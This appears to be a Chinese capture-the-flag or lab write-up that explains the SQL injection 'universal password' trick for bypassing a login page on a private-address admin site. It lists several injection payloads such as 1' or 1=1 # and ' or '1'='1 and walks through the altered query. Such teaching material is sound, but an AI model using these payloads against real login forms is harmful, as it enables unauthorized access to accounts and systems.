打开目标站点,随便输入用户名密码,查看返回结果,提示错误
后台管理http://10.225.91.25/
知识点:这题需要用到万能密码
首先了解一下万能密码。
一般的,库验证登录注册查询数据会用到以下的句型,如果用户名与密码匹配正确则返回真值通过验证成功登录。
select * from table_name where username='×××' and password='×××';
如果不匹配数据库也能返回真值那么就能绕过验证登录。如果我们传入的username为:
1' or 1=1 #
1' and 1=1 #
1' or 1=1 -- --后面加空格否则报错
1' and 1=1 -- --后面加空格否则报错
' or '1'='1
(第一个“1”可以随意修改),随便输入password,那么传入后端验证时SQL语句为
select * from table_name where username='1' or 1=1 # ' and password='xxxxxx' ;
注:因为SQL语句中#为注释符,那么SQL语句为:
select * from table_name where username='1' or 1=1
因为1=1恒为真,所以SQL语句返回真值,成功绕过验证